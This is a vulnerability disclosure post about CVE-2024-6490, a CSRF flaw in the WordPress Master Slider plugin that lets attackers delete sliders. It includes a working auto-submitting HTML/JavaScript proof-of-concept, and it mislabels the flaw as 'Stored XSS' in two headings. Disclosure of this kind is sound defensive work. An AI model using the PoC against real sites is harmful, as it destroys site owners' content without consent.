In the ever-evolving landscape of WordPress security, plugins often introduce as much risk as they do functionality. A recent discovery in the Master Slider plugin, a popular choice among WordPress users for creating responsive image and content sliders, underscores this issue vividly. This article delves into a critical CSRF (Cross-Site Request Forgery) vulnerability identified in the plugin, labeled under CVE-2024-6490, which allows attackers to delete sliders without authorization.
CVE | CVE-2024-6490 |
Plugin | Master Slider โ Responsive Touch Slider <= 3.9.10 |
Critical | High |
All Time | 2 852 272 |
Active installations | 80 000+ |
Publicly Published | August 1, 2024 |
Last Updated | August 1, 2024 |
Researcher | Dmtirii Ignatyev |
OWASP TOP-10 | A2: Broken Authentication and Session Management |
PoC | Yes |
Exploit | No |
Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6490 https://wpscan.com/vulnerability/5a56e5aa-841d-4be5-84da-4c3b7602f053/ |
Plugin Security Certification by CleanTalk | |
Logo of the plugin |
Timeline
June 4, 2024 | Plugin testing and vulnerability detection in the Master Slider have been completed |
June 4, 2024 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
August 1, 2024 | Registered CVE-2024-6490 |
Discovery of the Vulnerability
The vulnerability was uncovered during routine security checks designed to assess the robustness of plugins against common web attacks. CSRF vulnerabilities exploit the trust that a site has in the user’s browser, allowing attackers to perform actions without the user’s knowledge or consent. In the case of Master Slider, the vulnerability was triggered through a seemingly innocuous piece of HTML code that could be placed on any website visited by an administrator.
Understanding of Stored XSS attack’s
Cross-Site Request Forgery (CSRF) is a well-documented web security flaw that allows an attacker to induce users to perform actions that they do not intend to perform. It targets state-changing requests like data deletion or update and can lead to significant disruptions in service. WordPress, with its extensive plugin ecosystem, is particularly vulnerable to CSRF due to the varied security practices of third-party developers.
Exploiting the Stored XSS Vulnerability
The exploitation of this CSRF vulnerability is alarmingly straightforward. An attacker only needs to trick an administrator into clicking a link or visiting a malicious website where the CSRF exploit code is silently executed. This code then sends a forged request to the WordPress site where the Master Slider is installed, leading to the deletion of sliders. The proof of concept provided shows how simple HTML and JavaScript can be used to create a form that automatically submits this request.
POC:
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/wordpress/wp-admin/admin.php"> <input type="hidden" name="page" value="master-slider" /> <input type="hidden" name="action" value="delete" /> <input type="hidden" name="slider_id" value="4" /> <input type="hidden" name="paged" value="" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>
____
The risks associated with this vulnerability are not to be underestimated. For websites that rely heavily on sliders for user engagement or advertising, the unauthorized deletion of these elements could lead to a loss of revenue, diminished user experience, and damage to the site’s reputation. Furthermore, the simplicity of launching a CSRF attack makes it a likely attack vector for malicious actors targeting websites with less stringent security measures.
Recommendations for Improved Security
To mitigate this vulnerability and enhance overall site security, it is recommended that:
- Use Nonces: WordPress offers a mechanism called nonces (number used once) to protect against CSRF. Plugin developers should utilize nonces in every form and AJAX request that results in a state change.
- Educate Users: Admin users should be educated about the dangers of CSRF attacks and cautious about clicking links from unknown or untrusted sources.
By taking proactive measures to address CSRF vulnerabilities like CVE-2024-6490, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #VeryHighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.